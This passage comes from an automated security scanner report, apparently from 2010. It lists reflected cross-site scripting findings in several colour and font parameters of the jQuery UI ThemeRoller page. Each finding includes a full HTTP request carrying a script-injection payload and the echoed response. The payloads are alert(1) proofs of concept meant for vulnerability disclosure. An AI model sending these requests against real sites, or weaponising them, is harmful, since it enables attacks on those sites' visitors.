GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF316fc"><script>alert(1)</script>934e76f5e&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120316

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF316fc"><script>alert(1)</script>934e76f5e&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefa
...[SNIP]...

2.65. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b5e"><script>alert(1)</script>d56abac4e9f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333f9b5e"><script>alert(1)</script>d56abac4e9f&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333f9b5e"><script>alert(1)</script>d56abac4e9f&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_fl
...[SNIP]...

2.66. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c4d"><script>alert(1)</script>6643b1f4f9e was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFFf5c4d"><script>alert(1)</script>6643b1f4f9e&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFFf5c4d"><script>alert(1)</script>6643b1f4f9e&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHig
...[SNIP]...

2.67. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e03"><script>alert(1)</script>652973ad3a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif72e03"><script>alert(1)</script>652973ad3a&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif72e03"><script>alert(1)</script>652973ad3a&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorC
...[SNIP]...

2.68. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e1d"><script>alert(1)</script>b18d92c30eb was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%51e1d"><script>alert(1)</script>b18d92c30eb&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120320

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%51e1d"><script>alert(1)</script>b18d92c30eb&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent
...[SNIP]...

2.69. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e74"><script>alert(1)</script>2a56f0acf06 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bolde4e74"><script>alert(1)</script>2a56f0acf06&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120257

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bolde4e74"><script>alert(1)</script>2a56f0acf06&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&b
...[SNIP]...

2.70. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f91a5"><script>alert(1)</script>c8880d7a410 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCf91a5"><script>alert(1)</script>c8880d7a410&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCf91a5"><script>alert(1)</script>c8880d7a410&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01
...[SNIP]...

2.71. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73e9d"><script>alert(1)</script>ab4376d587b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666673e9d"><script>alert(1)</script>ab4376d587b&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666673e9d"><script>alert(1)</script>ab4376d587b&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_s
...[SNIP]...

2.72. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86ff"><script>alert(1)</script>44c93a3107d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFFc86ff"><script>alert(1)</script>44c93a3107d&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFFc86ff"><script>alert(1)</script>44c93a3107d&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgO
...[SNIP]...

2.73. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b3"><script>alert(1)</script>16217d3125f was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

